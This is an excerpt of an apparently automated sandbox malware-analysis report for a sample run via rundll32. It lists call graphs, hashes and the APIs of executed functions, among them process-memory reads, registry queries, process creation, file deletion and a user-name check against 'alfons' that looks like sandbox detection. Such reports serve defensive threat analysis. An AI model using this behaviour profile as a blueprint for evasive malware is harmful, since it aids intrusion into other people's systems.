calls 50799->50800 50800->50791 50890 1fb3ab78fe8 50801->50890 50804 1fb3ab7ba98 3 API calls 50805 1fb3ab76bd7 50804->50805 50806 1fb3ab76c12 50805->50806 50807 1fb3ab7ba98 3 API calls 50805->50807 50809 1fb3ab77b40 NtFreeVirtualMemory 50806->50809 50812 1fb3ab737c1 50806->50812 50808 1fb3ab76bed 50807->50808 50808->50806 50810 1fb3ab76bf1 50808->50810 50809->50812 50811 1fb3ab77b40 NtFreeVirtualMemory 50810->50811 50811->50812 50813 1fb3ab777b0 50812->50813 50814 1fb3ab777f1 50813->50814 50815 1fb3ab77803 RtlInitUnicodeString NtCreateFile 50814->50815 50816 1fb3ab737e5 NtClose 50815->50816 50816->50637 50818 1fb3ab731d6 50817->50818 50819 1fb3ab73215 wsprintfW 50818->50819 50820 1fb3ab73243 50819->50820 50821 1fb3ab73235 50819->50821 50820->50788 50822 1fb3ab7bb2c NtAllocateVirtualMemory 50821->50822 50822->50820 50824 1fb3ab789d4 3 API calls 50823->50824 50825 1fb3ab730f6 50824->50825 50826 1fb3ab73194 2 API calls 50825->50826 50827 1fb3ab730fe 50826->50827 50835 1fb3ab7310b 50827->50835 50836 1fb3ab77b98 50827->50836 50829 1fb3ab7315e 50830 1fb3ab77b40 NtFreeVirtualMemory 50829->50830 50832 1fb3ab7316c 50830->50832 50831 1fb3ab73116 50831->50829 50834 1fb3ab7ba98 3 API calls 50831->50834 50833 1fb3ab77b40 NtFreeVirtualMemory 50832->50833 50832->50835 50833->50835 50834->50829 50835->50791 50835->50793 50837 1fb3ab77bb5 50836->50837 50843 1fb3ab77bbf 50837->50843 50844 1fb3ab7b154 50837->50844 50839 1fb3ab77e42 50840 1fb3ab7ba98 3 API calls 50839->50840 50839->50843 50841 1fb3ab77e65 50840->50841 50842 1fb3ab77b40 NtFreeVirtualMemory 50841->50842 50841->50843 50842->50843 50843->50831 50853 1fb3ab788f8 50844->50853 50847 1fb3ab7b192 50847->50839 50848 1fb3ab7ba98 3 API calls 50849 1fb3ab7b1a5 50848->50849 50850 1fb3ab7b1bd 50849->50850 50865 1fb3ab7b1d4 50849->50865 50852 1fb3ab77b40 NtFreeVirtualMemory 50850->50852 50852->50847 50854 1fb3ab7895b 50853->50854 50856 1fb3ab78916 50853->50856 50855 1fb3ab7896a RtlFormatCurrentUserKeyPath 50854->50855 50857 1fb3ab78979 50855->50857 50860 1fb3ab78951 50855->50860 50859 1fb3ab7ba98 3 API calls 50856->50859 50858 1fb3ab7ba98 3 API calls 50857->50858 50858->50860 50859->50860 50861 1fb3ab78955 50860->50861 50862 1fb3ab7ba98 3 API calls 50860->50862 50861->50847 50861->50848 50863 1fb3ab789af 50862->50863 50863->50861 50864 1fb3ab77b40 NtFreeVirtualMemory 50863->50864 50864->50861 50881 1fb3ab7bf4c 50865->50881 50868 1fb3ab7b20d 50868->50850 50870 1fb3ab7b22c 50870->50868 50871 1fb3ab7b246 NtQueryValueKey 50870->50871 50871->50868 50872 1fb3ab7b27e 50871->50872 50873 1fb3ab7ad34 NtAllocateVirtualMemory 50872->50873 50874 1fb3ab7b289 50873->50874 50875 1fb3ab7b32f NtClose 50874->50875 50876 1fb3ab7b29a NtQueryValueKey 50874->50876 50875->50868 50877 1fb3ab7b2cb 50876->50877 50878 1fb3ab7b2df 50876->50878 50879 1fb3ab7ad34 NtAllocateVirtualMemory 50877->50879 50880 1fb3ab77b40 NtFreeVirtualMemory 50878->50880 50879->50878 50880->50875 50882 1fb3ab7b209 50881->50882 50883 1fb3ab7bf66 50881->50883 50882->50868 50885 1fb3ab7b0c4 50882->50885 50884 1fb3ab7bb2c NtAllocateVirtualMemory 50883->50884 50884->50882 50886 1fb3ab7bf4c NtAllocateVirtualMemory 50885->50886 50887 1fb3ab7b0f1 50886->50887 50888 1fb3ab7b0f5 50887->50888 50889 1fb3ab7b108 NtOpenKey 50887->50889 50888->50870 50889->50888 50891 1fb3ab7bb2c NtAllocateVirtualMemory 50890->50891 50893 1fb3ab79008 50891->50893 50892 1fb3ab76bbb 50892->50804 50892->50812 50893->50892 50894 1fb3ab77b40 NtFreeVirtualMemory 50893->50894 50894->50892 50896 1fb3ab775ae 50895->50896 50897 1fb3ab775c0 RtlInitUnicodeString 50896->50897 50945 1fb3ab77414 GetFileAttributesW 50897->50945 50900 1fb3ab7760e NtCreateFile 50901 1fb3ab77607 50900->50901 50902 1fb3ab77673 NtClose 50900->50902 50901->50658 50902->50901 50947 1fb3ab779c8 50903->50947 50906 1fb3ab77537 50906->50664 50909 1fb3ab77572 50912 1fb3ab77b40 NtFreeVirtualMemory 50909->50912 50910 1fb3ab77568 50961 1fb3ab77694 RtlInitUnicodeString NtDeleteFile 50910->50961 50912->50906 50914 1fb3ab78ae0 2 API calls 50913->50914 50915 1fb3ab73762 50914->50915 50976 1fb3ab76298 50915->50976 50919 1fb3ab7365e 50919->50677 50921 1fb3ab73c42 SetEvent 50920->50921 50922 1fb3ab73c4f 50920->50922 50921->50922 50923 1fb3ab73c59 ReleaseMutex CloseHandle 50922->50923 50924 1fb3ab73690 50922->50924 50923->50924 50925 1fb3ab73a24 50924->50925 50926 1fb3ab73a42 CreateFileW 50925->50926 50938 1fb3ab73695 50925->50938 50927 1fb3ab73a8a 50926->50927 50926->50938 50928 1fb3ab7ad34 NtAllocateVirtualMemory 50927->50928 50929 1fb3ab73af5 50928->50929 50930 1fb3ab73b1b SetFileInformationByHandle 50929->50930 50929->50938 50931 1fb3ab73b7b 50930->50931 50932 1fb3ab73b67 50930->50932 50934 1fb3ab77b40 NtFreeVirtualMemory 50931->50934 50933 1fb3ab77b40 NtFreeVirtualMemory 50932->50933 50933->50938 50935 1fb3ab73b85 CloseHandle CreateFileW 50934->50935 50936 1fb3ab73bd5 50935->50936 50935->50938 50937 1fb3ab73be9 SetFileInformationByHandle 50936->50937 50937->50938 50939 1fb3ab73c14 CloseHandle 50937->50939 50938->50687 50939->50938 50941 1fb3ab7b41a 50940->50941 50942 1fb3ab7b452 CreateProcessW 50941->50942 50943 1fb3ab736f9 50942->50943 50944 1fb3ab7b4a6 CloseHandle CloseHandle 50942->50944 50943->50698 50944->50943 50946 1fb3ab77439 50945->50946 50946->50900 50946->50901 50948 1fb3ab777b0 2 API calls 50947->50948 50949 1fb3ab779fe 50948->50949 50950 1fb3ab77533 50949->50950 50962 1fb3ab77768 50949->50962 50950->50906 50955 1fb3ab77acc 50950->50955 50956 1fb3ab777b0 2 API calls 50955->50956 50957 1fb3ab77b07 50956->50957 50958 1fb3ab77557 50957->50958 50974 1fb3ab77a54 NtWriteFile 50957->50974 50958->50906 50958->50909 50958->50910 50961->50909 50970 1fb3ab77704 50962->50970 50965 1fb3ab778c0 50966 1fb3ab7ad34 NtAllocateVirtualMemory 50965->50966 50967 1fb3ab7793a 50966->50967 50968 1fb3ab77957 NtReadFile 50967->50968 50969 1fb3ab77953 NtClose 50967->50969 50968->50969 50969->50950 50971 1fb3ab77721 50970->50971 50972 1fb3ab77730 NtQueryInformationFile 50971->50972 50973 1fb3ab77757 50972->50973 50973->50950 50973->50965 50975 1fb3ab77abc NtClose 50974->50975 50975->50958 50977 1fb3ab762b4 50976->50977 50978 1fb3ab7ad34 NtAllocateVirtualMemory 50977->50978 50979 1fb3ab762c9 50978->50979 50980 1fb3ab7376a 50979->50980 50981 1fb3ab762f0 MultiByteToWideChar 50979->50981 50982 1fb3ab7b344 50980->50982 50981->50980 50983 1fb3ab7b35e 50982->50983 50985 1fb3ab7b369 50983->50985 50986 1fb3ab7c2c4 50983->50986 50985->50919 50987 1fb3ab7c30c 50986->50987 50989 1fb3ab7c317 50987->50989 50990 1fb3ab7c478 50987->50990 50989->50985 50992 1fb3ab7c4c3 50990->50992 50991 1fb3ab7c4ce 50991->50989 50992->50991 50993 1fb3ab789d4 3 API calls 50992->50993 50996 1fb3ab7c5c0 50993->50996 50994 1fb3ab7c683 50995 1fb3ab7ad34 NtAllocateVirtualMemory 50994->50995 51002 1fb3ab7c6a2 50995->51002 50996->50994 50997 1fb3ab7ad34 NtAllocateVirtualMemory 50996->50997 50998 1fb3ab7c5ff 50997->50998 50999 1fb3ab7c642 wsprintfW 50998->50999 51000 1fb3ab7c676 50999->51000 51001 1fb3ab77b40 NtFreeVirtualMemory 51000->51001 51001->50994 51003 1fb3ab7c76f wsprintfW 51002->51003 51004 1fb3ab7c7da 51003->51004 51005 1fb3ab77b40 NtFreeVirtualMemory 51004->51005 51005->50991

                                                                  Executed Functions

                                                                  Function 000001FB3AB7463C Relevance: 15.3, APIs: 10, Instructions: 291nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 1fb3ab7463c-1fb3ab746b9 GetModuleHandleW GetCurrentProcessId call 1fb3ab77b80 call 1fb3ab78ae0 call 1fb3ab7ae78 7 1fb3ab746cd-1fb3ab746d5 0->7 8 1fb3ab746bb-1fb3ab746cb 0->8 9 1fb3ab746dd-1fb3ab7470b call 1fb3ab7bc1c call 1fb3ab7cbbc 7->9 8->9 14 1fb3ab74711-1fb3ab7471d 9->14 15 1fb3ab7471f-1fb3ab7472f call 1fb3ab78560 call 1fb3ab78fe0 14->15 16 1fb3ab74735-1fb3ab74741 14->16 15->16 18 1fb3ab7474f-1fb3ab7475b 16->18 19 1fb3ab74743-1fb3ab74749 GetCurrentProcessId 16->19 20 1fb3ab74b32-1fb3ab74b36 18->20 21 1fb3ab74761-1fb3ab74769 18->21 19->18 20->14 25 1fb3ab74b3c-1fb3ab74b44 20->25 23 1fb3ab7478d-1fb3ab747ae GetCurrentProcessId OpenProcess 21->23 24 1fb3ab7476b-1fb3ab74783 call 1fb3ab7841c 21->24 23->20 28 1fb3ab747b4-1fb3ab74815 NtQueryInformationProcess 23->28 24->23 39 1fb3ab74785 24->39 29 1fb3ab74c1c-1fb3ab74c21 25->29 30 1fb3ab74b4a-1fb3ab74b82 call 1fb3ab7bc64 call 1fb3ab7bb2c 25->30 35 1fb3ab7481b-1fb3ab74824 28->35 36 1fb3ab74b27-1fb3ab74b2c CloseHandle 28->36 32 1fb3ab74c28-1fb3ab74c34 29->32 33 1fb3ab74c23 call 1fb3ab74c38 29->33 46 1fb3ab74b88-1fb3ab74b9f call 1fb3ab7ae78 30->46 47 1fb3ab74c14 30->47 33->32 35->36 40 1fb3ab7482a-1fb3ab7487b ReadProcessMemory 35->40 36->20 39->23 40->36 42 1fb3ab74881-1fb3ab748d5 ReadProcessMemory 40->42 42->36 44 1fb3ab748db-1fb3ab748e5 42->44 44->36 48 1fb3ab748eb-1fb3ab74999 call 1fb3ab7ad34 WideCharToMultiByte call 1fb3ab7bfcc * 2 44->48 53 1fb3ab74ba1-1fb3ab74bb1 46->53 54 1fb3ab74bb3-1fb3ab74bbb 46->54 47->29 62 1fb3ab7499b-1fb3ab749d2 call 1fb3ab7bfcc 48->62 63 1fb3ab749f4-1fb3ab749fa 48->63 56 1fb3ab74bc3-1fb3ab74be7 call 1fb3ab7beb0 call 1fb3ab7b900 53->56 54->56 71 1fb3ab74be9-1fb3ab74bf1 56->71 72 1fb3ab74bf3 56->72 62->63 74 1fb3ab749d4-1fb3ab749ef call 1fb3ab7bfcc 62->74 66 1fb3ab74a1c-1fb3ab74a53 call 1fb3ab76298 * 2 63->66 67 1fb3ab749fc-1fb3ab74a17 call 1fb3ab7bfcc 63->67 84 1fb3ab74a59 66->84 85 1fb3ab74b04-1fb3ab74b09 66->85 67->66 76 1fb3ab74bfb-1fb3ab74c12 call 1fb3ab77b40 71->76 72->76 74->63 76->29 86 1fb3ab74a62-1fb3ab74a7e call 1fb3ab7bd7c 84->86 87 1fb3ab74b1d-1fb3ab74b22 call 1fb3ab77b40 85->87 88 1fb3ab74b0b-1fb3ab74b13 85->88 93 1fb3ab74a80-1fb3ab74aaa call 1fb3ab7bc1c call 1fb3ab7ad90 86->93 94 1fb3ab74aac-1fb3ab74ac1 86->94 87->36 88->87 90 1fb3ab74b15 88->90 90->87 93->86 96 1fb3ab74af3-1fb3ab74afd call 1fb3ab76298 94->96 97 1fb3ab74ac3-1fb3ab74af1 call 1fb3ab7bc1c call 1fb3ab76298 94->97 96->85 97->85
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentMemory$HandleRead$AllocateByteCharCloseInformationModuleMultiNameOpenQueryUserVirtualWidewsprintf
                                                                  • String ID:
                                                                  • API String ID: 3997021431-0
                                                                  • Opcode ID: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
                                                                  • Instruction ID: cc63b39d3714fda7f396af326f9f0bff73ea2c2c2eaf72ce8f13dea13ddca1d5
                                                                  • Opcode Fuzzy Hash: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
                                                                  • Instruction Fuzzy Hash: 02F14E3DA8CB8685E760DB24E4843EAB3A8FB84784F600135D68D87799EF7ED445CB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB77588 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43nativefileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$AttributesCloseCreateInitStringUnicode
                                                                  • String ID: 0$@
                                                                  • API String ID: 2504508917-1545510068
                                                                  • Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                                                                  • Instruction ID: 6a8a4288ff1a11caf3ac7d6b287c3b10e597fdb3a734a7c47523e01b49a67e89
                                                                  • Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                                                                  • Instruction Fuzzy Hash: 9621247A5187C187E7609F14E09439BB7A8F7C0348F604125E6C947AA9EBBEE489CF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB777B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFileInitStringUnicode
                                                                  • String ID: 0$@
                                                                  • API String ID: 2498367268-1545510068
                                                                  • Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                                                                  • Instruction ID: a9d248d79d1bb2ba4c75fcb99962b3901e505d996d6585e0425ae5490bf1efd4
                                                                  • Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                                                                  • Instruction Fuzzy Hash: CD21D3765087C186E760CF14F49478BBBA4F3C4398FA08229E2D947AA8DB7DD589CF40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB768E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                  • String ID: o
                                                                  • API String ID: 2718687846-252678980
                                                                  • Opcode ID: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
                                                                  • Instruction ID: 5b00cb16619b98e728d725e281d91af7f350b4bf3ab7bb63d383620dd138e538
                                                                  • Opcode Fuzzy Hash: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
                                                                  • Instruction Fuzzy Hash: FC115A3E908B01C6D7709B14E0943AAB7B4F78C798F540225E68D47B68EBBDC680CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB7B0C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 354 1fb3ab7b0c4-1fb3ab7b0f3 call 1fb3ab7bf4c 357 1fb3ab7b0f9-1fb3ab7b13e call 1fb3ab7ae1c NtOpenKey 354->357 358 1fb3ab7b0f5-1fb3ab7b0f7 354->358 362 1fb3ab7b140 357->362 363 1fb3ab7b148 357->363 359 1fb3ab7b14d-1fb3ab7b151 358->359 362->363 363->359
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID: 0$@
                                                                  • API String ID: 71445658-1545510068
                                                                  • Opcode ID: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
                                                                  • Instruction ID: 83c15a0bc45c4688808c987eaecd517ac5ddec0bdb01a051f7295fef37bd72dd
                                                                  • Opcode Fuzzy Hash: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
                                                                  • Instruction Fuzzy Hash: 62014F7A6186C186D760DF10E48039BBBA8F7C43C4FA04125E6CA86A69EB7DC555CF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB78AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NameUserwsprintf
                                                                  • String ID: alfons
                                                                  • API String ID: 54179028-1092396413
                                                                  • Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                                                                  • Instruction ID: adc20849eab4a9a05a21b0be8a7ee639f2181a94058c279aac11d69e2931875e
                                                                  • Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                                                                  • Instruction Fuzzy Hash: 38F01C7DA6868392EB50AB14F8C03F9A329FB98784FE00031A14D46994EF7DD24ADB41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB7B1D4 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
                                                                  • Instruction ID: 5b21f9238487bf9fe6a36a0a5a265297d365cced72f719a6047ada2b53423bd9
                                                                  • Opcode Fuzzy Hash: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
                                                                  • Instruction Fuzzy Hash: 31413D3E619A8186D750DB15E4803AEB7A4FBC4784F605025FA8E83B69EF7ED584CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB7A350 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID:
                                                                  • API String ID: 2188284642-0
                                                                  • Opcode ID: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
                                                                  • Instruction ID: 0a77885bd019b44a25d9b3af705b311519e54c4b9ad0b4258c33eb097a7ab1f7
                                                                  • Opcode Fuzzy Hash: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
                                                                  • Instruction Fuzzy Hash: 0431033D95CA82C5E6B09B14E4C43FA6368FB84754F600239E69A426D9FF6FD5448702
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB7AD34 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID: @
                                                                  • API String ID: 2167126740-2766056989
                                                                  • Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                                                                  • Instruction ID: 24001611ebe67e6196830ec87dbf3770f94d1c009a446fe7e6bde4feb8168320
                                                                  • Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                                                                  • Instruction Fuzzy Hash: 7DE0307A628780C2D7409F54E49474BB764FB847B4F901315FAA947BD8CBBDC1148F00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB778C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateFileMemoryReadVirtual
                                                                  • String ID:
                                                                  • API String ID: 1637922817-0
                                                                  • Opcode ID: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
                                                                  • Instruction ID: 133b5e123b823ca29eeceeda9361a497d82eebcdbca0bb9d3cb73225a94c4888
                                                                  • Opcode Fuzzy Hash: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
                                                                  • Instruction Fuzzy Hash: DF210C3A618BC49AD760CB64E49435AB7A5F388790F908425EB8D83B68EFBDC554CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB779C8 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFileInitStringUnicode
                                                                  • String ID:
                                                                  • API String ID: 2498367268-0
                                                                  • Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                                                                  • Instruction ID: 921612a3850f40225439326a124dad341a595c5307d66c0f8f75dc9cc5551e84
                                                                  • Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                                                                  • Instruction Fuzzy Hash: 1601ED3E64C681C3E630DB15E48065AB7B4F789788F600125EACC47A59EB7ED651CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB7378C Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
                                                                  • Instruction ID: 3df06d7478c0b3193587b2b23006b7580df2b3c2b632ef9972a1373ce7edd8e1
                                                                  • Opcode Fuzzy Hash: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
                                                                  • Instruction Fuzzy Hash: 72F0C87D55C64282E3309B10E48079A7764FB843B8F200320F5ED46AD5EB7ED2448F01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB77A54 Relevance: 1.5, APIs: 1, Instructions: 25filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                                                                  • Instruction ID: 58548e05866c76b0b753b544f6a079cc38874f69dcc32f1ece4469ab07646d95
                                                                  • Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                                                                  • Instruction Fuzzy Hash: ABF0E73AA1CBD187E360CB64F48474BB7A4F384394F604125E6C982F68EBBDC1948F40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000001FB3AB77B40 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 3963845541-0
                                                                  • Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                                                                  • Instruction ID: e42f8bbd0cd5a415cd67f3b89a5fc0cf14f34a8b4eb9685bf3ef10d76b88951c
                                                                  • Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                                                                  • Instruction Fuzzy Hash: 59E0E679508B8182D7609B54E4847997774F3853B4FA44315E6B941AF4DF7DC189CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180070044 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 116memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
